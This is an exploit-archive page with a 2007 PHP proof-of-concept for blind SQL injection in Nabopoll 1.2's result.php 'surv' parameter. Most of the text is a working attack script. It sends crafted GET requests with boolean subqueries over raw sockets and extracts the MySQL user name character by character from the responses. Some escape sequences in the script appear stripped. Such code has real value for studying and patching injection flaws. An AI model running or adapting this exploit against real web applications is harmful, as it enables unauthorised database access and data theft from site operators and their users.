[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Nabopoll 1.2 (result.php surv) Remote Blind SQL Injection Exploit
# Published : 2007-02-21
# Author : s0cratex
# Previous Title : DBGuestbook 1.1 (dbs_base_path) Remote File Include Vulnerabilities
# Next Title : deV!Lz Clanportal [DZCP] <= 1.4.5 Remote File Disclosure Vulnerability
<?
# Nabopoll Blind SQL Injection P0C Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex@hotmail.com
error_reporting(0);
ini_set("max_execution_time",0);
// just change the default values...
$srv = "localhost"; $path = "/poll"; $port = 80;
$survey = "8"; //you can verify the number entering in the site and viewing the results...
echo "==================================================n";
echo "Nabopoll SQL Injection -- Proof of Concept Exploitn";
echo "--------------------------------------------------nn";
echo " -- MySQL User: ";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl = "/result.php?surv=".$survey."/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),".$j.",1))=".$x."),1,0)))/*";
$cnx = fsockopen($srv,$port);
fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0rnrn");
while(!feof($cnx)){ if(ereg("power",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } }
fclose($cnx);
if ($x==255) {
die("n Try again...");
}
}
$j++;
}
echo "n";
?>
# www.Syue.com [2007-02-21]